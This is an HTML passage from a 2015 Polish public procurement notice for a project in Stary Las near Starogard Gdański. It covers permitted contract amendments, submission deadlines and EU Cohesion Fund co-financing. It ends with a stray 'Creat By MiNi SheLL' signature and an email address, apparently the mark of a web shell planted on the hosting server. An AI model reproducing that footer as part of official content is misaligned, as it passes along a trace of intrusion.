<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy,
2) w przypadku pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu
zakończenia realizacji umowy.
3) zmiana nazwy, siedziby stron umowy, numerów kont bankowych oraz innych danych
identyfikacyjnych.
4) zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej
zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w
interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia;
5) wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.
6) zmiana może dotyczyć zmiany kwoty wynagrodzenia ryczałtowego lub zmiany ceny
jednostkowej określonej w ofercie przetargowej w związku ze zmianą stawki podatku VAT.
Zmiana taka może być dokonana po wejściu w życie Rozporządzenia regulującego zmianę
stawek VAT.
Powyższe zmiany dopuszczone będą wyłącznie pod warunkiem złożenia wniosku przez
Wykonawcę i po akceptacji przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starylas.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> stary las 9, 83- 200 Starogard Gdański.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2015 godzina 10:00, miejsce: Stary Las 9, 83- 200 Starogard Gdański.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program współfinansowany ze środków Unii Europejskiej. Programu Infrastruktura i Środowisko. Fundusz Spójności.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com